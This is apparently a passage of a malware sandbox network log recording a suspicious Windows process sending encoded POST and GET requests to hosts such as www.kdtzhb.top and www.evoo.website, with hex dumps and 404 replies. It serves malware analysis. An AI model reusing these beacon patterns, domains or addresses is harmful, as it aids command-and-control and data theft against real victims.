                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 4a 4b 77 4a 39 41 53 68 76 53 65 41 47 5a 78 2f 75 49 58 55 6c 57 41 67 56 33 35 45 35 71 36 41 36 71 35 4c 77 6a 41 32 51 6b 49 4f 63 47 64 45 44 52 75 64 49 6c 6c 6d 58 6c 51 63 33 78 69 35 59 55 4e 72 79 6d 76 34 4f 4f 39 46 56 51 56 62 61 4a 6f 4d 73 33 32 2b 33 62 66 6b 68 32 53 34 34 61 46 67 39 73 4d 6a 59 75 62 78 4f 65 61 2f 58 35 52 70 37 72 33 30 43 33 57 32 53 70 4f 54 4b 56 39 2b 50 64 2f 6f 45 46 50 37 69 6f 5a 49 79 36 49 4d 76 50 59 4c 6e 68 55 72 33 36 54 74 57 4f 33 56 47 48 44 77 63 6c 32 74 6f 30 70 6f 7a 66 4e 76 4b 54 39 46 2b 56 4b 6b 79 59 51 55 5a 64 31 79 2b 41 69 47 78 74 76 39 4b 6c 4a 46 49 32 62 5a 2b 6d 52 68 6b 34 48 61
                                                                                        Data Ascii: A60d=JKwJ9AShvSeAGZx/uIXUlWAgV35E5q6A6q5LwjA2QkIOcGdEDRudIllmXlQc3xi5YUNrymv4OO9FVQVbaJoMs32+3bfkh2S44aFg9sMjYubxOea/X5Rp7r30C3W2SpOTKV9+Pd/oEFP7ioZIy6IMvPYLnhUr36TtWO3VGHDwcl2to0pozfNvKT9F+VKkyYQUZd1y+AiGxtv9KlJFI2bZ+mRhk4Ha
                                                                                         Nov 6, 2024 16:00:52.077533007 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                        Server: nginx
                                                                                        Date: Wed, 06 Nov 2024 15:00:51 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 548
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                         19 | 192.168.2.8 | 49727 | 47.242.89.146 | 80 | 5188 | C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                         Timestamp | Bytes transferred | Direction | Data
                                                                                         Nov 6, 2024 16:00:53.774487019 CET | 1664 | OUT | POST /1iqa/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 1241
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.kdtzhb.top
                                                                                        Origin: http://www.kdtzhb.top
                                                                                        Referer: http://www.kdtzhb.top/1iqa/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 4a 4b 77 4a 39 41 53 68 76 53 65 41 47 5a 78 2f 75 49 58 55 6c 57 41 67 56 33 35 45 35 71 36 41 36 71 35 4c 77 6a 41 32 51 6b 41 4f 62 30 46 45 5a 7a 47 64 61 56 6c 6d 4c 56 51 5a 33 78 69 65 59 51 5a 76 79 6d 6a 43 4f 4e 46 46 56 79 4e 62 53 59 6f 4d 6d 33 32 2b 2b 37 66 70 73 57 53 58 34 61 31 6b 39 74 38 6a 59 75 62 78 4f 59 65 2f 51 71 4a 70 39 72 33 7a 4b 58 57 79 59 4a 50 30 4b 56 6c 75 50 63 76 34 44 31 76 37 69 4c 68 49 77 4a 67 4d 74 76 59 4a 72 42 55 7a 33 36 66 32 57 4f 72 5a 47 45 66 65 63 69 43 74 37 42 59 44 6f 4f 46 75 59 44 51 37 32 6c 32 67 7a 6f 55 33 55 65 35 68 33 79 75 66 35 4e 32 58 4e 6c 34 4a 66 30 75 63 67 54 64 6e 31 39 53 73 38 76 2b 6c 71 78 44 2b 55 66 39 66 4f 74 55 41 6b 31 41 2b 79 36 56 4f 4c 4f 76 2f 30 42 6b 71 65 33 73 35 65 36 33 4a 44 6a 2f 37 53 55 45 77 6f 74 58 49 54 72 6c 4c 4e 71 6d 64 74 50 34 52 4a 30 37 52 71 77 39 52 6e 48 30 63 59 73 32 4e 6b 4e 68 32 33 73 2b 64 5a 30 56 4a 75 51 69 4a 71 4f 6c 55 4e 72 38 64 47 68 42 51 54 61 70 35 4c [TRUNCATED]
                                                                                         Data Ascii: A60d=[TRUNCATED]
                                                                                         Nov 6, 2024 16:00:54.698548079 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                        Server: nginx
                                                                                        Date: Wed, 06 Nov 2024 15:00:54 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 548
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        20 | 192.168.2.8 | 49728 | 47.242.89.146 | 80 | 5188 | C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 6, 2024 16:00:56.334151030 CET | 376 | OUT | GET /1iqa/?A60d=EIYp+2qno3OyA6JRko7EkEQRXSdht8qBodEq6zBYd0MwR3tzbR3TIlddc30TsymXBRZ2l1bBHfxTXhxkRZRQhWC34rDkgUmQuOVrwdU4dvabP7OAcppow6eveUPberj5Ig==&QftlZ=CnaPg8j HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Connection: close
                                                                                        Host: www.kdtzhb.top
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Nov 6, 2024 16:00:57.285500050 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                        Server: nginx
                                                                                        Date: Wed, 06 Nov 2024 15:00:57 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 548
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        21 | 192.168.2.8 | 49729 | 128.65.195.180 | 80 | 5188 | C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 6, 2024 16:01:02.655230999 CET | 633 | OUT | POST /293d/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 205
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.evoo.website
                                                                                        Origin: http://www.evoo.website
                                                                                        Referer: http://www.evoo.website/293d/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 32 5a 6d 7a 6b 4d 49 4e 54 59 61 61 4b 2b 4a 34 44 4b 44 4f 32 6b 4c 74 36 69 39 51 65 73 64 78 33 45 4b 49 52 46 62 41 4d 32 79 42 77 61 4e 6f 6c 42 39 4e 46 41 59 78 6f 37 6e 57 38 38 35 76 59 43 69 66 50 35 73 59 4c 7a 50 34 48 51 37 30 4d 76 7a 44 57 4b 59 33 31 72 44 76 55 78 71 4e 62 4b 63 4e 53 69 70 6f 44 64 65 4a 6c 45 5a 71 6f 51 75 51 6d 6c 54 46 70 73 49 63 6c 69 49 65 30 42 4d 41 37 75 67 79 45 67 45 44 34 74 64 4d 70 67 42 48 66 51 61 46 6e 4d 50 69 49 69 38 34 32 4f 30 6a 49 30 72 33 79 36 33 76 62 2b 51 33 49 43 52 47 65 46 47 6c 6b 46 44 41 38 58 6f 79 4a 57 74 36 70 58 30 3d
                                                                                        Data Ascii: A60d=2ZmzkMINTYaaK+J4DKDO2kLt6i9Qesdx3EKIRFbAM2yBwaNolB9NFAYxo7nW885vYCifP5sYLzP4HQ70MvzDWKY31rDvUxqNbKcNSipoDdeJlEZqoQuQmlTFpsIcliIe0BMA7ugyEgED4tdMpgBHfQaFnMPiIi842O0jI0r3y63vb+Q3ICRGeFGlkFDA8XoyJWt6pX0=
                                                                                        Nov 6, 2024 16:01:03.414921999 CET | 458 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Wed, 06 Nov 2024 15:01:03 GMT
                                                                                        Server: Apache/2.4.25 (Debian)
                                                                                        Content-Length: 278
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 65 76 6f 6f 2e 77 65 62 73 69 74 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.25 (Debian) Server at www.evoo.website Port 80</address></body></html>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        22 | 192.168.2.8 | 49730 | 128.65.195.180 | 80 | 5188 | C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 6, 2024 16:01:05.209865093 CET | 653 | OUT | POST /293d/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 225
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.evoo.website
                                                                                        Origin: http://www.evoo.website
                                                                                        Referer: http://www.evoo.website/293d/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 32 5a 6d 7a 6b 4d 49 4e 54 59 61 61 46 2b 35 34 41 74 58 4f 2b 6b 4c 71 35 69 39 51 46 63 64 31 33 45 4f 49 52 42 4c 51 50 43 65 42 33 2f 78 6f 33 51 39 4e 45 41 59 78 6a 62 6e 58 7a 63 35 77 59 43 75 58 50 38 4d 59 4c 7a 4c 34 48 56 2f 30 4d 2f 4f 78 58 61 59 31 2b 4c 44 58 4a 68 71 4e 62 4b 63 4e 53 6a 4d 44 44 5a 79 4a 6c 30 70 71 70 30 79 50 72 46 54 61 2f 38 49 63 76 43 49 61 30 42 4e 56 37 73 55 4c 45 69 4d 44 34 73 74 4d 71 31 68 41 52 51 61 44 6a 4d 4f 31 4f 54 42 32 75 76 4d 41 55 57 44 2b 30 4a 53 52 65 49 68 64 53 67 5a 41 64 46 75 4f 6b 47 72 32 35 67 31 61 54 31 39 4b 33 41 6a 73 4f 64 59 39 74 2f 32 32 30 4a 6f 54 42 63 51 50 4c 6e 65 54
                                                                                        Data Ascii: A60d=2ZmzkMINTYaaF+54AtXO+kLq5i9QFcd13EOIRBLQPCeB3/xo3Q9NEAYxjbnXzc5wYCuXP8MYLzL4HV/0M/OxXaY1+LDXJhqNbKcNSjMDDZyJl0pqp0yPrFTa/8IcvCIa0BNV7sULEiMD4stMq1hARQaDjMO1OTB2uvMAUWD+0JSReIhdSgZAdFuOkGr25g1aT19K3AjsOdY9t/220JoTBcQPLneT
                                                                                        Nov 6, 2024 16:01:06.028194904 CET | 458 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Wed, 06 Nov 2024 15:01:05 GMT
                                                                                        Server: Apache/2.4.25 (Debian)
                                                                                        Content-Length: 278
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 65 76 6f 6f 2e 77 65 62 73 69 74 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.25 (Debian) Server at www.evoo.website Port 80</address></body></html>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        23 | 192.168.2.8 | 49731 | 128.65.195.180 | 80 | 5188 | C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 6, 2024 16:01:07.805094004 CET | 1670 | OUT | POST /293d/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 1241
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.evoo.website
                                                                                        Origin: http://www.evoo.website
                                                                                        Referer: http://www.evoo.website/293d/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 32 5a 6d 7a 6b 4d 49 4e 54 59 61 61 46 2b 35 34 41 74 58 4f 2b 6b 4c 71 35 69 39 51 46 63 64 31 33 45 4f 49 52 42 4c 51 50 43 57 42 33 4e 4a 6f 6c 6a 6c 4e 44 41 59 78 71 37 6e 53 7a 63 34 73 59 42 65 70 50 38 4a 76 4c 78 44 34 56 48 33 30 64 38 57 78 4f 71 59 31 6a 62 44 73 55 78 71 59 62 4a 6b 42 53 69 38 44 44 5a 79 4a 6c 33 78 71 67 41 75 50 34 31 54 46 70 73 49 59 6c 69 49 79 30 46 6f 75 37 73 51 62 45 7a 73 44 34 50 46 4d 72 42 42 41 5a 51 61 42 6d 4d 4f 39 4f 54 4e 39 75 76 67 6d 55 54 58 48 30 4a 71 52 66 35 63 36 47 6a 42 67 48 58 36 36 6f 6c 33 69 67 51 46 51 61 6e 68 6e 72 33 54 56 42 49 41 71 6e 2b 2b 61 7a 4f 35 69 51 72 52 65 47 51 7a 4e 32 30 59 77 67 53 42 5a 2f 4e 71 2f 35 69 66 4e 49 46 43 6a 42 4b 6d 53 6c 44 78 72 50 4b 6b 79 76 4a 4c 43 4b 36 32 63 62 4d 48 73 6e 37 54 6f 32 6e 54 50 73 77 4e 70 43 4f 79 7a 36 6e 45 79 36 63 4f 6f 66 74 69 51 58 33 50 58 41 57 6c 50 72 6c 51 57 52 38 75 5a 79 6e 42 62 2b 58 50 73 7a 50 70 31 4e 4c 4c 6e 54 37 6b 77 43 78 6e 4d 37 [TRUNCATED]
                                                                                        Data Ascii: A60d=2ZmzkMINTYaaF+54AtXO+kLq5i9QFcd13EOIRBLQPCWB3NJoljlNDAYxq7nSzc4sYBepP8JvLxD4VH30d8WxOqY1jbDsUxqYbJkBSi8DDZyJl3xqgAuP41TFpsIYliIy0Fou7sQbEzsD4PFMrBBAZQaBmMO9OTN9uvgmUTXH0JqRf5c6GjBgHX66ol3igQFQanhnr3TVBIAqn++azO5iQrReGQzN20YwgSBZ/Nq/5ifNIFCjBKmSlDxrPKkyvJLCK62cbMHsn7To2nTPswNpCOyz6nEy6cOoftiQX3PXAWlPrlQWR8uZynBb+XPszPp1NLLnT7kwCxnM7 [TRUNCATED]
                                                                                        Nov 6, 2024 16:01:08.612478971 CET | 458 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Wed, 06 Nov 2024 15:01:08 GMT
                                                                                        Server: Apache/2.4.25 (Debian)
                                                                                        Content-Length: 278
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 65 76 6f 6f 2e 77 65 62 73 69 74 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.25 (Debian) Server at www.evoo.website Port 80</address></body></html>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        24 | 192.168.2.8 | 49732 | 128.65.195.180 | 80 | 5188 | C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 6, 2024 16:01:10.354365110 CET | 378 | OUT | GET /293d/?QftlZ=CnaPg8j&A60d=7bOTn4s4CK+jD9JxCOvk7GPe7C1JF/pOmj70YCSuK3OR6e0KuyF5TSw/saz3rP1zPyqrHIRHHBHNYmPna8SGRb4J0orjC0OEaNIQeyVbD4LqlGxYuRKPk3SC/Id1jS91tA== HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Connection: close
                                                                                        Host: www.evoo.website
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Nov 6, 2024 16:01:11.182080984 CET | 458 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Wed, 06 Nov 2024 15:01:11 GMT
                                                                                        Server: Apache/2.4.25 (Debian)
                                                                                        Content-Length: 278
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 65 76 6f 6f 2e 77 65 62 73 69 74 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.25 (Debian) Server at www.evoo.website Port 80</address></body></html>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
